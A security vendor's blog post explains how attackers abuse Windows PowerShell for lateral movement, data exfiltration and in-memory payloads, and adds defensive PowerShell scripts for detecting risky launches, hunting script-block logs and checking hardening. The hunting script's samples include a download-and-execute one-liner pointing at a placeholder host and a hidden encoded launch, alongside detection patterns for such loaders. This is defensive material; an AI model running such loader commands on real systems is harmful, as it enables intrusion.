Windows PowerShell is a useful admin tool that attackers can easily exploit if the proper controls are not in place.

What is PowerShell? Understanding vulnerabilities and practical mitigations

Written by:

Jherome DeGuzman, Solutions Engineer Manager

A deep dive into PowerShell, the real-world threats and mitigations

PowerShell is a Microsoft-made tool for task automation and system management that’s built right into Windows. It’s essentially a mix of a command-line shell and a smart scripting language that gives admins and power users total control over their computers and networks.

PowerShell plays a critical role in the Windows ecosystem, and its versatility makes it an invaluable tool in most enterprise environments. Much of modern Windows system administration is performed through PowerShell.

The coolest part is that unlike the old-school Command Prompt, PowerShell works with objects instead of just plain text. This makes it much easier to filter and move data around without a headache.

It’s a standard Windows feature because it’s the "go-to" for things like fixing system errors, deploying software, or handling bulk tasks like setting up hundreds of user accounts at once. It’s also great for big-picture work. You can use it to run commands on remote machines or manage cloud services like Azure and Microsoft 365. That mix of remote power and deep system access is exactly why it’s one of the most useful tools on a modern PC.

Its reputation as a trusted tool comes from its omnipresence and from the industry expectation that every sysadmin uses it, or at least knows of it.

But that trust can be easily exploited.

How attackers abuse PowerShell

The same uses that make PowerShell such a helpful tool are also what make it so attractive to attackers.

Cybercriminals often abuse PowerShell’s deep access to carry out fileless attacks that bypass traditional detection solutions. It can be used to secretly download malicious payloads, move laterally within a network, escalate privileges, and exfiltrate sensitive data—all without ever creating a detectable file on disk.

At the end of the day, PowerShell is a perfect example of how a great admin tool can become a dangerous weapon if not secured properly.

Using PowerShell for lateral movement

One of the biggest vulnerabilities is how PowerShell can be used for lateral movement.

Once an attacker gets into just one machine, they can use PowerShell to execute commands that abuse standard network protocols like SMB or WMI to quietly spread to other computers.

This lets them compromise additional systems and expand their footprint without relying on obvious, clunky remote desktop tools.

For example, if a corporate network gets breached, an attacker with stolen credentials could run PowerShell scripts on dozens of computers at the same time, spreading their control in seconds.

Data access and exfiltration

PowerShell is also incredibly good at file access and stealing data. It can find, zip up, and send files out of a network.

An attacker could easily write a quick script to hunt down sensitive documents (like .docx or .xlsx files), pack them into a zip folder, and ship them off to an external server.

Attackers often use PowerShell to scrape data from local drives, network shares, or mapped drives. This harvested data can then be exfiltrated or leveraged to facilitate further actions like lateral movement and escalating privileges.

Living-off-the-land attacks

Suppose an attacker gains access to a non-admin, low-privilege endpoint. Once inside, they use legitimate PowerShell commands like Invoke-WebRequest, Invoke-Expression, or Start-Process to download and execute malicious payloads directly in memory.

These commands leave minimal observable activity on the hard drive, allowing them to bypass many traditional antivirus and endpoint detection tools.

Launching BitLocker and other processes

Attackers often use PowerShell to execute malicious commands, including encrypting entire drives with BitLocker, either on its own or as one stage of a chained attack. By its nature, it is an application that casts a wide net.

It’s wise to ensure that other applications cannot launch PowerShell in order to stop attackers from being able to execute additional payloads, establish persistence mechanisms, or obscure malicious activity by blending it with legitimate system processes.
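One way to see whether that control is holding is to look at who is launching PowerShell. The following is an added example written for this post (it is not ThreatLocker's code and not from the original article): it reads Windows Security Event ID 4688 (process creation) and flags PowerShell hosts started by parents that should never spawn a shell, such as Office applications, browsers or script hosts. It assumes "Audit Process Creation" is enabled (the Command column is only filled when command-line auditing is also on); the list of risky parents and the sample pairs are constructed assumptions you would tune for your environment.

```powershell
# Added example: flag PowerShell processes started by parents that should never launch a shell.
# Relies on Security log Event ID 4688 (needs "Audit Process Creation" enabled).
# The parent list below is an assumption for illustration; tune it to your estate.

$script:ShellHosts = @('powershell.exe', 'pwsh.exe', 'powershell_ise.exe')
$script:RiskyParents = @(
    'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe',   # Office documents with macros
    'msedge.exe', 'chrome.exe', 'firefox.exe',                   # browser-delivered content
    'wscript.exe', 'cscript.exe', 'mshta.exe'                    # script hosts
)

function Test-RiskyPowerShellLaunch {
    <# Returns $true when a shell host was started by a parent on the risky list. #>
    param(
        [Parameter(Mandatory)][string]$NewProcessName,
        [Parameter(Mandatory)][string]$ParentProcessName
    )
    $child  = [IO.Path]::GetFileName($NewProcessName).ToLowerInvariant()
    $parent = [IO.Path]::GetFileName($ParentProcessName).ToLowerInvariant()
    return ($child -in $script:ShellHosts) -and ($parent -in $script:RiskyParents)
}

function ConvertFrom-ProcessCreationEvent {
    <# Pulls the named EventData fields out of a 4688 record's XML, so no field index is hard-coded. #>
    param([Parameter(Mandatory)]$Record)
    $xml  = [xml]$Record.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time    = $Record.TimeCreated
        User    = $data['SubjectUserName']
        Child   = $data['NewProcessName']
        Parent  = $data['ParentProcessName']
        Command = $data['CommandLine']   # empty unless command-line auditing is enabled
    }
}

function Get-RiskyPowerShellLaunches {
    param([int]$MaxEvents = 2000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-ProcessCreationEvent -Record $_ } |
        Where-Object { $_.Child -and $_.Parent -and (Test-RiskyPowerShellLaunch $_.Child $_.Parent) }
}

# Constructed sample parent/child pairs so the rule can be exercised without an event log.
$samples = @(
    @{ Child = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Parent = 'C:\Windows\explorer.exe' },
    @{ Child = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Parent = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE' },
    @{ Child = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; Parent = 'C:\Windows\System32\svchost.exe' }
)
foreach ($s in $samples) {
    '{0} <- {1}: risky={2}' -f [IO.Path]::GetFileName($s.Child), [IO.Path]::GetFileName($s.Parent), (Test-RiskyPowerShellLaunch $s.Child $s.Parent)
}
# Expected for the three samples: False, True, False (only the Word-launched shell is flagged).

# Live query against the local Security log (needs rights to read it):
Get-RiskyPowerShellLaunches | Format-Table Time, User, Parent, Command -AutoSize
```

Explorer-launched and svchost-launched (scheduled task) shells are deliberately not flagged, because they are how administrators and automation normally start PowerShell; the point of the check is the parent relationship, which is also the relationship an application-launch control such as the one described above would block outright.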

Connecting to the internet

Finally, PowerShell is great at talking to the outside world.

Because it has built-in web commands like Invoke-WebRequest, it can often bypass strict company firewalls. Many organizations block regular users from visiting certain sites but still let system-level tools like PowerShell connect to the internet.

This lets hackers download malicious files or talk to their command servers. Even worse, an attacker can run a quick "one-liner" command that pulls a script straight into the computer's memory and runs it without ever saving a file to the hard drive.

This technique is the basis of cut-and-paste attacks, and it makes the activity incredibly hard for standard antivirus software to spot.
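Because the in-memory loaders described in this section and in "Living-off-the-land attacks" never write a file, the most reliable native evidence is PowerShell's own script block log. The following is an added example (not part of the original post and not ThreatLocker's code) that scores Event ID 4104 records from the Microsoft-Windows-PowerShell/Operational log against a small set of loader indicators. It assumes Script Block Logging is enabled on the host; the indicator patterns, the two-indicator threshold and the sample script blocks are constructed for illustration.

```powershell
# Added example: hunt script block logs (Event ID 4104) for the in-memory download-and-execute
# patterns discussed above. Requires Script Block Logging; patterns and samples are constructed.

# Indicator patterns commonly seen in in-memory "one-liner" loaders (illustrative, not exhaustive).
$script:SuspiciousPatterns = @{
    'Invoke-Expression' = '\bIEX\b|Invoke-Expression'
    'Remote download'   = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-RestMethod'
    'Base64 payload'    = 'FromBase64String|-EncodedCommand|\s-enc\s'
    'Hidden window'     = '-WindowStyle\s+Hidden|\s-w\s+hidden'
    'Bypass switches'   = '-ExecutionPolicy\s+Bypass|-NoProfile|-nop\b'
}

function Test-SuspiciousScriptBlock {
    <# Returns the names of every indicator matched in a script block's text (-match is case-insensitive). #>
    param([Parameter(Mandatory)][string]$Text)
    $hits = foreach ($name in $script:SuspiciousPatterns.Keys) {
        if ($Text -match $script:SuspiciousPatterns[$name]) { $name }
    }
    return @($hits)
}

function Get-SuspiciousScriptBlocks {
    <#
      Reads 4104 events from the local Operational log and reports blocks matching at least
      $MinIndicators patterns. For a 4104 record, Properties[2] is the ScriptBlockText and
      Properties[4] is the script path, which is empty when the code never touched disk.
    #>
    param([int]$MinIndicators = 2, [int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $hits = @(Test-SuspiciousScriptBlock -Text $text)
            if ($hits.Count -ge $MinIndicators) {
                $path = [string]$_.Properties[4].Value
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Path       = if ($path) { $path } else { '<in-memory>' }
                    Indicators = ($hits -join ', ')
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample blocks so the scoring can be exercised offline (the URL is non-resolvable).
$samples = @(
    'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")',
    'powershell -nop -w hidden -enc <base64-placeholder>'
)
foreach ($s in $samples) {
    $hits = @(Test-SuspiciousScriptBlock -Text $s)
    '{0} indicator(s): {1}' -f $hits.Count, ($hits -join ', ')
}
# Expected: 0 for the admin command, 2 for the download-and-run line, 3 for the hidden encoded launch.

# Live hunt (needs Script Block Logging enabled and rights to read the log):
Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

A single indicator is noisy (plenty of legitimate automation uses Invoke-WebRequest), which is why the default threshold is two; a block that both fetches remote content and evaluates it, or that runs hidden with an encoded payload, is the shape of the "one-liner" this section describes.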

How a Zero Trust model prevents PowerShell abuse

Securing PowerShell requires understanding exactly what it can do once it’s running.

Default-deny allowlisting policies block any unauthorized PowerShell scripts or commands from running in the first place, even if executed entirely in memory.

Enforcing least privilege access at the file system level also ensures that PowerShell can’t be used to harvest data from the endpoint and the drive shares that the endpoint can access.

ThreatLocker Ringfencing takes these controls to the next level.

Ringfencing enables you to restrict legitimate and approved tools like PowerShell from interacting with files, network locations, or other applications unless explicitly approved. This prevents attackers from using it to move laterally, access sensitive documents, or reach external servers.
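The controls above map onto a handful of native PowerShell and Windows settings whose state can be read back. The following is an added example (not ThreatLocker's code and not part of the original post) that reports that posture: logging for visibility, Constrained Language Mode and execution policy for containment, AppLocker script rules for default-deny allowlisting, and the WinRM service for remoting exposure. The registry locations are Microsoft's standard policy paths; the "Recommended" column is this example's own baseline and is an assumption, not a vendor setting.

```powershell
# Added example: read-only posture check of the native controls behind the measures above.
# Registry paths are Microsoft's standard PowerShell policy keys; the Recommended column is
# an assumed baseline for illustration.

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Get-PowerShellHardeningState {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $checks = @()

    # 1. Visibility: script block logging, module logging and transcription.
    $checks += [pscustomobject]@{ Control = 'ScriptBlockLogging'; Current = Get-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging'; Recommended = 1 }
    $checks += [pscustomobject]@{ Control = 'ModuleLogging';      Current = Get-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging';           Recommended = 1 }
    $checks += [pscustomobject]@{ Control = 'Transcription';      Current = Get-PolicyValue "$base\Transcription" 'EnableTranscripting';          Recommended = 1 }

    # 2. Containment: Constrained Language Mode limits arbitrary .NET access, so a script that
    #    does run cannot freely reach raw WebClient or reflection primitives.
    $checks += [pscustomobject]@{ Control = 'LanguageMode'; Current = $ExecutionContext.SessionState.LanguageMode.ToString(); Recommended = 'ConstrainedLanguage' }

    # 3. Execution policy is a safety rail rather than a security boundary, but Unrestricted is a smell.
    $checks += [pscustomobject]@{ Control = 'ExecutionPolicy (LocalMachine)'; Current = (Get-ExecutionPolicy -Scope LocalMachine).ToString(); Recommended = 'AllSigned or RemoteSigned' }

    # 4. Default-deny allowlisting: is there an enforced AppLocker Script rule collection?
    $scriptRules = 'AppLocker cmdlets unavailable'
    if (Get-Command Get-AppLockerPolicy -ErrorAction SilentlyContinue) {
        $policyXml = [xml](Get-AppLockerPolicy -Effective -Xml)
        $rc = $policyXml.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Script' }
        $scriptRules = if ($rc) { '{0} rule(s), {1}' -f $rc.ChildNodes.Count, $rc.EnforcementMode } else { 'none' }
    }
    $checks += [pscustomobject]@{ Control = 'AppLocker Script rules'; Current = $scriptRules; Recommended = '>0, EnforcementMode=Enabled' }

    # 5. Lateral-movement surface: is WinRM (PowerShell remoting) running on this host?
    $winrm = Get-Service WinRM -ErrorAction SilentlyContinue
    $winrmState = if ($winrm) { $winrm.Status.ToString() } else { 'not installed' }
    $checks += [pscustomobject]@{ Control = 'WinRM service'; Current = $winrmState; Recommended = 'Stopped unless remoting is required' }

    return $checks
}

Get-PowerShellHardeningState | Format-Table -AutoSize
```

Run it in an elevated session on a representative endpoint and compare the Current and Recommended columns; a machine with no script block logging, FullLanguage mode and no Script rule collection has none of the visibility or default-deny properties this section relies on.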

For a deep dive into how Ringfencing keeps PowerShell in check, read “Lock down PowerShell vulnerabilities” in Cyber Hero Frontline, Issue 2.
